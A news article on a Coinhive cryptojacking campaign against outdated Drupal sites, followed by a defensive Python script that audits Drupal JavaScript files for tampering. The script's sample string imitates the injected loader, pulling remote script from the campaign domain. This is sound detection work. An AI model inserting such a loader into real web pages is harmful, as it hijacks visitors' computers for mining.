Drupal Sites Targeted by Large Cryptojacking Campaign

With interest in cryptocurrencies growing all over the world, some hackers have invented new ways to mine virtual currencies. By injecting malicious code into websites, they are able to steal the unused CPU power of visitors. Some websites appear to be more vulnerable than others, and in this case we are talking about Drupal sites.

Massive Cryptojacking Attack

According to Bad Packets, there was an ongoing cryptojacking campaign affecting different websites, including the San Diego Zoo and the government of Chihuahua, Mexico. Bad Packets explains that the two sites are not related to each other, but both use an ‘outdated and vulnerable’ version of the Drupal content management system. Apparently, more than 300 websites were affected by the same cryptojacking campaign.

The affected pages have been injected with Coinhive, the software used to steal visitors’ CPU power.

The report presented by Bad Packets reads as follows:

“Digging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method. The malicious code was contained in the “/misc/jquery.once.js?v=1.2” JavaScript library. Soon thereafter, I was notified of additional compromised sites using a different payload. However, all the infected sites pointed to the same domain using the same Coinhive site key.”

The historical DNS data collected from SecurityTrails revealed that the domain name vuuwd.com was previously used in Monero (XMR) mining operations through mineXRM.com. The report says that the operators switched from a mining pool with a 1% fee to Coinhive, which takes 30% of all the mining proceeds.

The important conclusion was that all 348 infected websites analyzed were using an outdated version of the Drupal content management system. The Drupalgeddon 2 vulnerability has also been exploited in the past. Websites using Drupal need to update to the latest available version to avoid being infected by Coinhive injections.
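For site owners checking their own installation, the following added example (not code from Bad Packets or the Drupal project) audits the JavaScript files under `misc/`, where the quoted report found the injected `jquery.once.js`. It assumes you have a pristine copy of the same Drupal release to compare against; the regexes, function names and sample strings are constructed for illustration.

```python
import hashlib
import re
from pathlib import Path

# Indicators named in the article: the Coinhive miner and the vuuwd.com domain.
# The regexes and the third, generic rule are assumptions of this example.
INDICATORS = {
    "coinhive-reference": re.compile(r"coinhive", re.I),
    "campaign-domain": re.compile(r"vuuwd\.com", re.I),
    "external-script-load": re.compile(
        r"""(?:\bsrc\s*=|getScript\s*\()\s*["'](?:https?:)?//""", re.I),
}

# Constructed samples: a stand-in for a clean misc/jquery.once.js, and the same
# file with a script loader appended (the .js file name is a placeholder).
CLEAN = "(function ($) {\n  $.fn.once = function (id, fn) { return this; };\n})(jQuery);\n"
INJECTED = CLEAN + 'var s=document.createElement("script");s.src="//vuuwd.com/PLACEHOLDER.js";document.head.appendChild(s);\n'

def scan_js(text):
    """Return the sorted names of indicators found in one JavaScript source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def sha256(path):
    """Hex SHA-256 of a file's bytes."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def audit_misc(docroot, pristine_root):
    """Compare <docroot>/misc/*.js with a pristine copy of the same Drupal release.

    Returns {relative path: {"modified": bool, "indicators": [...]}} for every
    file that differs from the pristine copy or matches an indicator.
    """
    report = {}
    docroot, pristine_root = Path(docroot), Path(pristine_root)
    for path in sorted((docroot / "misc").rglob("*.js")):
        rel = path.relative_to(docroot)
        ref = pristine_root / rel
        # A file with no pristine counterpart is treated as modified.
        modified = not ref.is_file() or sha256(ref) != sha256(path)
        hits = scan_js(path.read_text(encoding="utf-8", errors="replace"))
        if modified or hits:
            report[rel.as_posix()] = {"modified": modified, "indicators": hits}
    return report

if __name__ == "__main__":
    import sys
    for name, result in audit_misc(sys.argv[1], sys.argv[2]).items():
        print(name, result)
```

The hash comparison catches any change to a core file, including obfuscated payloads that the string indicators would miss; the indicators only help triage which modified files match this campaign.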

There is a website that was created to help you test whether your web browser has been infected by cryptojacking malware; find our review of that here. Also be sure to see our report on Ahref's cryptocurrency hijacking mining research, released a few months ago.
